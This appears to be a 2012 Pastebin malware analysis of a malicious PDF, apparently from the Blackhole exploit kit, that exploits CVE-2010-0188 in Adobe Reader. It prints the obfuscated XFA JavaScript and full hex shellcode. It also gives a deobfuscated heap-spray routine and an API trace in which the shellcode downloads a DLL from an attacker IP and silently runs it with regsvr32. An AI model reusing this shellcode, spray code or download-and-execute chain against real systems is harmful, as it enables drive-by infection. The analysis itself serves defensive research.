API tools faq
paste
Advertisement
unixfreaxjp

#Malware Analysis - BlackHole PDF CVE-2010-0188 Infector)

unixfreaxjp
Apr 28th, 2012
479
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.35 KB | None | 0 0
raw download clone embed print report
  1. I supposed to paste this report to the VT comments, but for some reason I couldn't paste it well. So I put it here. Please refer to the below VT analysis URL for this analysis.
  2. https://www.virustotal.com/file/f3836e899f2cef2338a31be6dae936f0e9ef53f43d677daacfd0e032b3a27253/analysis/
  3. ==========================
  4. Description:
  5. ==========================
  6. [code] This is the malicious PDF used by Exploit Pack (strongly suspected) blackhole for dropping the malware.
  7. The malicious part in this PDF is in obfuscated JavaScript to exploit the privillege using CVE-2010-0188 & executing the shellcode to download and running the malware downloader trojan. [/code]
  8. ==========================
  9. Sample was found here:
  10. ==========================
  11. [code] --22:30:52-- hxxp://188.127.249.241/content/ap2.php?f=696
  12. => 'ap2.php@f=696'
  13. Connecting to 188.127.249.241:80... connected.
  14. HTTP request sent, awaiting response... 200 OK
  15. Length: 24,792 (24K) (application/pdf)
  16. 100%(====================================>) 24,792 25.49K/s
  17. 22:30:54 (25.47 KB/s) - 'ap2.php@f=696' saved (24792/24792) [/code]
  18. *) PLEASE BE NOTED THE PATTERN OF THE URL MARKED ABOVE FOR THE FURTHER INFECTION INVESTIGATION
  19. ==========================
  20. The Malware Code:
  21. ==========================
  22. *) the malware code is located as an object in obfuscated javascript below:
  23. [code] <h:xdp xmlns:h="http://ns.adobe.com/xdp/">
  24. <asd/>as<config xmlns='123'><asd/>
  25. <h:present>
  26. <pdf
  28. <h:interactive>1</h:interactive>
  29. <asd/>a<h:version>1.5</h:version>
  30. a<asd/>
  31. </pdf>
  32. </h:present>
  33. <asd/></config><asd/>
  34. <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
  35. <asd/>
  36. a<subform name="a1"> <pageSet>
  37. <pageArea id="roteYom" name="roteYom">
  38. <contentArea h="512pt" w="214pt" x="0.25in" y="0.25in"/>
  39. <medium long="792pt" short="612pt" stock="default"/>
  40. </pageArea>
  41. </pageSet>
  42. <subform name='asdvsa'><field name='qwe123b'><event activity='initialize'>
  43. <h:script contentType='application/x-javascript'>
  44.  
  45. if(this)ar=「-4,
  46.  
  47. -3,
  48.  
  49. -2,
  50. :
  51. (continued for 6,000lines)
  52. :
  53.  
  54. 21,
  55.  
  56. 22,
  57.  
  58. 5」;
  59.  
  60. function test3(){if (s)v=ar「z];s=s& amp;#43;cc[v+4]&#59;}
  61. cc={q:"var pding;b,cefhots_x=w& amp;#65;y()l1'420657839u{.VS'<+I}*/DkR%-W[」mCj^?:LBKQYEUqFM"}.q&#59;
  62. qq=& amp;#39;ghej4vabl'&#59;
q=qq[2」+qq[5]+qq[6];
q=& amp;#113;+qq[8];
b= {v:{q:{x:this}}}.v.q.x&#59;
w= {v:b「q]}.v&#59;
  63. s=Array()&#59;
n={v:cc}.v;
for(i=0;i-3790<0&#59;i++){
  64. z=i&#59;
test3()&#59;
  65. 
}
w(s);

  66. </h:script>a
  67. </event><ui>
  68. <imageEdit/>
  69. </ui>
  70. </field>
  71. </subform>
  72. </subform></template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
  73. <xfa:data><a1 test="123">
  74. </a1>
  75. </xfa:data>
  76. </xfa:datasets>
  77. </h:xdp> [/code]
  78.  
  79. Deobfs above obfs javascript and found the eval with the below shellcode value:
  80. [code] var _l1 = '
  81. 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000
  82. 0000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
  83. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
  84. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
  85. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
  86. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
  87. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
  88. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
  89. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
  90. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
  91. 1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
  92. 663d36393626653d340000';
  93. var _l2 = '
  94. 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
  95. 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
  96. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
  97. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
  98. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
  99. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
  100. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
  101. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
  102. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
  103. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
  104. 1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
  105. 663d36393626653d340000'; [/code]
  106.  
  107. Complete deobfs will be something like this:
  108. [code]
  109. var padding;
  110. var bbb, ccc, ddd, eee, fff, ggg, hhh;
  111. var pointers_a, i;
  112. var x = new Array();
  113. var y = new Array();
  114. var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f663d36393626653d340000';
  115. var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f663d36393626653d340000';
  116. //_l3 = app;
  117. _l4 = new Array();
  118. function _l5()
  119. {
  120. var _l6 = _l3.viewerVersion.toString();
  121. _l6 = _l6.replace('.', '');
  122. while (_l6.length < 4)_l6 += '0';
  123. return parseInt(_l6, 10)
  124. }
  125. function _l7(_l8, _l9)
  126. {
  127. while (_l8.length * 2 < _l9)_l8 += _l8;
  128. return _l8.substring(0, _l9/2)
  129. }
  130. function _I0(_I1)
  131. {
  132. _I1=unescape(_I1);
  133. roteDak=_I1.length*2;
  134. dakRote=unescape('%u9090');
  135. spray=_l7(dakRote,0x2000-roteDak);
  136. loxWhee=_I1+spray;
  137. loxWhee=_l7(loxWhee,524098);
  138. for(i=0; i < 400; i++)_l4「i」=loxWhee.substr(0,loxWhee.length-1)+dakRote;
  139. }
  140. function _I2(_I1,len)
  141. {
  142. while(_I1.length<len)_I1+=_I1;
  143. return _I1.substring(0,len)
  144. }
  145. function _I3(_I1)
  146. {
  147. ret='';
  148. for(i=0;i<_I1.length;i+=2)
  149. {
  150. b=_I1.substr(i,2);
  151. c=parseInt(b,16);
  152. ret+=String.fromCharCode(c);
  153. }
  154. return ret
  155. }
  156. function _ji1(_I1,_I4)
  157. {
  158. _I5='';
  159. for(_I6=0;_I6<_I1.length;_I6++)
  160. {
  161. _l9=_I4.length;
  162. _I7=_I1.charCodeAt(_I6);
  163. _I8=_I4.charCodeAt(_I6%_l9);
  164. _I5+=String.fromCharCode(_I7^_I8);
  165. }
  166. return _I5
  167. }
  168. function _I9(_I6)
  169. {
  170. _j0=_I6.toString(16);
  171. _j1=_j0.length;
  172. _I5=(_j1%2)?'0'+_j0:_j0;
  173. return _I5
  174. }
  175. function _j2(_I1)
  176. {
  177. _I5='';
  178. for(_I6=0;_I6<_I1.length;_I6+=2)
  179. {
  180. _I5+='%u';
  181. _I5+=_I9(_I1.charCodeAt(_I6+1));
  182. _I5+=_I9(_I1.charCodeAt(_I6))
  183. }
  184. return _I5
  185. }
  186. function _j3()
  187. {
  188. _j4=_l5();
  189. _j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK' or _j5='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgED
  190. AAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////;
  191. _j6=_l1;
  192. _j7=_I3(_j6)} [/code]
  193. *) The above strings has similarity w/ the exploit in http://downloads.securityfocus.com/vulnerabilities/exploits/38195.py to be used to feed the crafted TIFF format to the adobe reader.
  194.  
  195. The shellcode (var _l2 & _l1) itself is using urlmon.dll and kernel.dll which is reversed as below:
  196. strings :
  197. [code] 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
  198. 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
  199. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
  200. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
  201. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
  202. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
  203. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
  204. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
  205. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
  206. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
  207. 1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
  208. 663d36393626653d340000'; [/code]
  209. ==========================
  210. If you see it in ASCII it will be like this:
  211. ==========================
  212. [code] L.'....J<.'..c.J...J0..Jn/.JAAAA&................9.Jd.'.....AAAA
  213. AAAAf......u4._3.d.@0.@..p.V.v.3.f.^<.t3,........@0.F9.u..4$..uQ
  214. ..LQV.u<.t5x..V.v...3.IA....3....8.t......@..;.u.^.^$..f..K.F..T
  215. $...........^Y..S..h..}.3t.....h...j.Y............XPj@h....P...P
  216. U...^......hon..hurlmT........a......r.......\$...$regs.D$.vr32.
  217. D$..-s.Sh.....V...3.Q.D..wpbt.D...dll.D...Y...0.D..AQj.j.SWj..V.
  218. ..u.j.S.V.j....S.V........G.?.u.G.?.u.j.j..V.......N.......o..3.
  219. .[..Fy6./phXXp://188.127.249.241/content/w.php?f=696&e=4.. [/code]
  220. *) You'll see the download url of the trojan downloader up there.
  221. ==========================
  222. If we reverse shellcode means like below:
  223. ==========================
  224. [code]
  225. 0x7c801ad9|kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)
  226. 0x7c801d7b|kernel32.LoadLibraryA(lpFileName=urlmon)
  227. 0x7c835dfa|kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])|
  228. 0x1a494bbe|urlmon.URLDownloadToFileA(pCaller=0, szURL=http://188.127.249.241/content/w.php?f=696&e=4, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)|0
  229. 0x7c86250d|kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)|
  230. 0x7c86250d|kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)|
  231. 0x7c81cb3b|kernel32.TerminateThread(dwExitCode=0) [/code]
  232. ==========================
  233. What it means?
  234. ==========================
  235. Means it downloaded from the marked url, and saved locally as wpbt0.dll & silently execute regsvr32 -s as process, for the infection. if you try to download the trojan, it wasn't there anymore, must be cleaned up, I guess this PDF infector was still in server during cleanup.
  236. ==========================
  237. Proof:
  238. ==========================
  239. [code] $ curl "http://188.127.249.241/content/w.php
  240. ?f=696&e=4"
  241. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  242. <html><head>
  243. <title>404 Not Found</title>
  244. </head><body>
  245. <h1>Not Found</h1>
  246. <p>The requested URL /content/w.php was not found on this server.</p>
  247. <p>Additionally, a 404 Not Found
  248. error was encountered while trying to use an ErrorDocument to handle the request
  249. .</p>
  250. <hr>
  251. <address>Apache/2 Server at 188.127.249.241 Port 80</address>
  252. </body></html> [/code]
  253. ------
  254. ZeroDay Japan http://0day.jp
  255. OPERATION CLEANUP JAPAN | #OCJP
  256. Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
  257. sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!